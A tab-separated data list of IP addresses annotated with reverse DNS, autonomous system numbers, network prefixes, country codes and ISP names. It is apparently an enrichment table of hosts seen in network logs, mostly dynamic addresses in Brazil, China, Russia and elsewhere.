177.91.87.54		263433	177.91.84.0/22		BR	Click Telecomunicacoes e Informatica LTDA
177.92.146.168	177-92-146-168.dynamic.starnetcomunicacao.com.br.	263120	177.92.146.0/23	STARNET	BR	COMUNICACAO MULTIMIDIA LTDA ME
177.92.149.209	177-92-149-209.dynamic.starnetcomunicacao.com.br.	263120	177.92.148.0/22	STARNET	BR	COMUNICACAO MULTIMIDIA LTDA ME
177.92.150.53	177-92-150-53.dynamic.starnetcomunicacao.com.br.	263120	177.92.150.0/23	STARNET	BR	COMUNICACAO MULTIMIDIA LTDA ME
179.127.53.184	179-127-53-184.dynamic.ultrawave.com.br.	262659	179.127.48.0/21	ULTRAWAVE	BR	TELECOM
179.127.54.118	179-127-54-118.dynamic.ultrawave.com.br.	262659	179.127.48.0/21	ULTRAWAVE	BR	TELECOM
180.117.130.158		4134	180.96.0.0/11	CHINANET-BACKBONE	CN	No.31,Jin-rong Street
180.137.148.6		4134	180.136.0.0/13	CHINANET-BACKBONE	CN	No.31,Jin-rong Street
180.36.124.239	p2701239-ipngn200905osakachuo.osaka.ocn.ne.jp.	4713	180.0.0.0/10	OCN	JP	NTT Communications Corporation
181.113.26.2		28006	181.113.24.0/21	CORPORACION	EC	NACIONAL DE TELECOMUNICACIONES - CNT EP
182.126.217.115	hn.kd.ny.adsl.	4837	182.112.0.0/12	CHINA169-BACKBONE	CN	CHINA UNICOM China169 Backbone
182.52.145.27	node-snv.pool-182-52.dynamic.totinternet.net.	23969	182.52.144.0/22	TOT-NET	TH	TOT Public Company Limited
183.15.88.213		4134	183.0.0.0/10	CHINANET-BACKBONE	CN	No.31,Jin-rong Street
183.15.88.41		4134	183.0.0.0/10	CHINANET-BACKBONE	CN	No.31,Jin-rong Street
186.193.194.200	186-193-194-200.byteweb.com.br.	262730	186.193.192.0/20		BR	Byteweb Comunicacao Multimidia Ltda.
186.3.240.99	host-186-3-240-99.netlife.ec.	27947	186.3.224.0/19		EC	Telconet S.A
186.47.225.218		28006	186.47.224.0/22	CORPORACION	EC	NACIONAL DE TELECOMUNICACIONES - CNT EP
187.95.230.23	187-95-230-23.user.voax.com.br.	53093	187.95.224.0/19	VOAX	BR	TELECOM SERVICOS LTDA
187.95.245.56	187-95-245-56.user.voax.com.br.	53093	187.95.224.0/19	VOAX	BR	TELECOM SERVICOS LTDA
188.16.144.147		12389	188.16.144.0/20	ROSTELECOM-AS	RU	ROSTELECOM-AS
188.16.146.193		12389	188.16.144.0/20	ROSTELECOM-AS	RU	ROSTELECOM-AS
188.243.37.3	188.243.37.3.pool.sknt.ru.	35807	188.242.0.0/15	SKYNET-SPB-AS	RU	SKYNET-SPB-AS
188.68.12.74		50596	188.68.8.0/21	ITNET33	RU	ITNET33
190.94.192.8	190-94-192-8.ifxnw.com.ve.	8053	190.94.192.0/19	IFX	VE	Networks Venezuela C.A.
191.242.132.3	191-242-132-3.byteweb.com.br.	262730	191.242.128.0/20		BR	Byteweb Comunicacao Multimidia Ltda.
200.52.25.201	200-52-25-201.dynamic.ultrawave.com.br.	262659	200.52.24.0/21	ULTRAWAVE	BR	TELECOM
201.148.162.206	201-148-162-206.dynamic.netvisiondns.com.br.	61864	201.148.160.0/22	NETVISION	BR	TELECOM LTDA - ME
201.150.108.253	201-150-108-253.ivatel.com.br.	52544	201.150.108.0/23		BR	Ivatel Redes e Internet LTDA
202.88.216.242		17488	202.88.216.0/24	HATHWAY-NET-AP	IN	Hathway IP Over Cable Internet
203.151.80.210	210.80.151.203.sta.inet.co.th.	4618	203.151.64.0/19	INET-TH-AS	TH	Internet Thailand Company Limited
203.69.191.102	203-69-191-102.HINET-IP.hinet.net.	3462	203.69.0.0/16	HINET	TW	Data Communication Business Group
212.113.226.119		31499	212.113.224.0/19	YCC-AS	RU	-- iHome --
218.88.85.13	13.85.88.218.broad.cd.sc.dynamic.163data.com.cn.	4134	218.88.0.0/16	CHINANET-BACKBONE	CN	No.31,Jin-rong Street
219.140.52.124		4134	219.140.0.0/16	CHINANET-BACKBONE	CN	No.31,Jin-rong Street
219.140.52.60		4134	219.140.0.0/16	CHINANET-BACKBONE	CN	No.31,Jin-rong Street
220.173.39.87		4134	220.173.0.0/16	CHINANET-BACKBONE	CN	No.31,Jin-rong Street
221.141.94.214		9318	221.140.0.0/14	SKB-AS	KR	SK Broadband Co Ltd
221.203.126.51		4837	221.200.0.0/14	CHINA169-BACKBONE	CN	CHINA UNICOM China169 Backbone
221.227.37.219		4134	221.224.0.0/13	CHINANET-BACKBONE	CN	No.31,Jin-rong Street
222.218.213.149		4134	222.218.0.0/16	CHINANET-BACKBONE	CN	No.31,Jin-rong Street
222.236.156.147		9318	222.232.0.0/13	SKB-AS	KR	SK Broadband Co Ltd
222.236.156.157		9318	222.232.0.0/13	SKB-AS	KR	SK Broadband Co Ltd
223.10.246.81		4134	223.8.0.0/13	CHINANET-BACKBONE	CN	No.31,Jin-rong Street
27.115.2.118		17621	27.115.0.0/18	CNCGROUP-SH	CN	China Unicom Shanghai network
27.21.170.241		4134	27.16.0.0/12	CHINANET-BACKBONE	CN	No.31,Jin-rong Street
27.24.137.140		4134	27.16.0.0/12	CHINANET-BACKBONE	CN	No.31,Jin-rong Street
36.112.59.206		4847	36.112.0.0/16	CNIX-AP	CN	China Networks Inter-Exchange
36.34.160.59		4837	36.32.0.0/14	CHINA169-BACKBONE	CN	CHINA UNICOM China169 Backbone
36.34.162.103		4837	36.32.0.0/14	CHINA169-BACKBONE	CN	CHINA UNICOM China169 Backbone
36.34.78.19		4837	36.32.0.0/14	CHINA169-BACKBONE	CN	CHINA UNICOM China169 Backbone
36.34.79.249		4837	36.32.0.0/14	CHINA169-BACKBONE	CN	CHINA UNICOM China169 Backbone
37.202.120.239		8376	37.202.120.0/22		JO	Jordan Data Communications
45.169.46.100		268097	45.169.46.0/23		BR	i10 Telecom ISP
45.186.89.185	45-186-89-185.pontocom.net.br.	269417	45.186.88.0/23	PONTOCOM	BR	SOLUCOES EM TECNOLOGIA LTDA
45.228.215.236	45-228-215-236.dynamic.mdnetfibra.com.	266112	45.228.214.0/23		BR	J. MATER PROVEDORES E SERVICOS DE TELECOM LTDA
45.65.222.136	45-65-222-136.linqtelecom.com.br.	266539	45.65.222.0/24	LINQ	BR	TELECOMUNICACOES LTDA ME
49.130.18.199		17924	49.130.0.0/17	SMARTONE-MB-AS-AP	HK	SmarTone Mobile Communications Ltd
49.71.130.7		4134	49.64.0.0/11	CHINANET-BACKBONE	CN	No.31,Jin-rong Street
5.165.206.130	5x165x206x130.dynamic.saratov.ertelecom.ru.	50543	5.165.204.0/22	SARATOV-AS	RU	SARATOV-AS
5.79.198.112	pool-5-79-198-112.is74.ru.	8369	5.79.128.0/17	INTERSVYAZ-AS	RU	38-B, Komsomolsky prospekt
51.81.28.122	ip122.ip-51-81-28.us.	16276	51.81.0.0/17	OVH	FR	OVH
58.209.70.66		4134	58.208.0.0/12	CHINANET-BACKBONE	CN	No.31,Jin-rong Street
58.243.134.54		4837	58.242.0.0/15	CHINA169-BACKBONE	CN	CHINA UNICOM China169 Backbone
58.48.153.37		4134	58.48.0.0/13	CHINANET-BACKBONE	CN	No.31,Jin-rong Street
59.115.190.232	59-115-190-232.dynamic-ip.hinet.net.	3462	59.115.0.0/16	HINET	TW	Data Communication Business Group
59.175.85.147		4134	59.172.0.0/14	CHINANET-BACKBONE	CN	No.31,Jin-rong Street
59.60.85.123	123.85.60.59.broad.nd.fj.dynamic.163data.com.cn.	4134	59.60.0.0/15	CHINANET-BACKBONE	CN	No.31,Jin-rong Street
59.60.85.144	144.85.60.59.broad.nd.fj.dynamic.163data.com.cn.	4134	59.60.0.0/15	CHINANET-BACKBONE	CN	No.31,Jin-rong Street
60.176.243.74	74.243.176.60.broad.hz.zj.dynamic.163data.com.cn.	4134	60.176.0.0/12	CHINANET-BACKBONE	CN	No.31,Jin-rong Street
60.250.194.43	60-250-194-43.HINET-IP.hinet.net.	3462	60.250.0.0/16	HINET	TW	Data Communication Business Group
61.190.124.202		4134	61.190.0.0/15	CHINANET-BACKBONE	CN	No.31,Jin-rong Street
67.206.219.142	142-219-206-67-static.centennialpr.net.	11992	67.206.192.0/18	CENTENNIAL-	PR	CENTENNIAL-
68.232.61.143	68.232.61.143-st-tel.net.	30027	68.232.48.0/20	STINET-1	US	STINET-1
68.96.25.174	mail.titanmed.com. OR wsip-68-96-25-174.om.om.cox.net.	22773	68.96.16.0/20	ASN-CXA-ALL-CCI-2277	US	ASN-CXA-ALL-CCI-2277
72.4.34.117	ubnt.customer.eplus.net.	53435	72.4.32.0/20	JACKSONENERGY-EPL	US	JACKSONENERGY-EPL
73.135.166.26	c-73-135-166-26.hsd1.md.comcast.net.	7922	73.0.0.0/8	COMCAST-7922	US	COMCAST-7922
78.66.209.175	78-66-209-175-no2202.tbcn.telia.com.	3301	78.64.0.0/12	TELIANET-SWEDEN	SE	Telia Company
78.84.117.149		12578	78.84.0.0/16	APOLLO-AS	LV	Latvia
78.84.98.26		12578	78.84.0.0/16	APOLLO-AS	LV	Latvia
79.113.190.226	79-113-190-226.rdsnet.ro.	8708	79.112.0.0/13	RCS-RDS	RO	73-75 Dr. Staicovici
84.237.166.85		12578	84.237.128.0/17	APOLLO-AS	LV	Latvia
89.39.28.72		34977	89.39.24.0/21	PROCONO-AS	ES	PROCONO-AS
92.253.19.163		8376	92.253.16.0/22		JO	Jordan Data Communications
94.249.0.32	94.249.x.32.go.com.jo.	8376	94.249.0.0/21		JO	Jordan Data Communications
95.15.118.7	95.15.118.7.dynamic.ttnet.com.tr.	9121	95.15.0.0/17	TTNET	TR	TTNET
96.9.79.23	23.79.9.96.sinet.com.kh.	131207	96.9.79.0/24	SINET-KH	KH	SINET, Cambodia's specialist Internet and Telecom Service Provider.
98.14.156.2	cpe-98-14-156-2.nyc.res.rr.com.	12271	98.14.0.0/16	TWC-12271-NYC	US	TWC-12271-NYC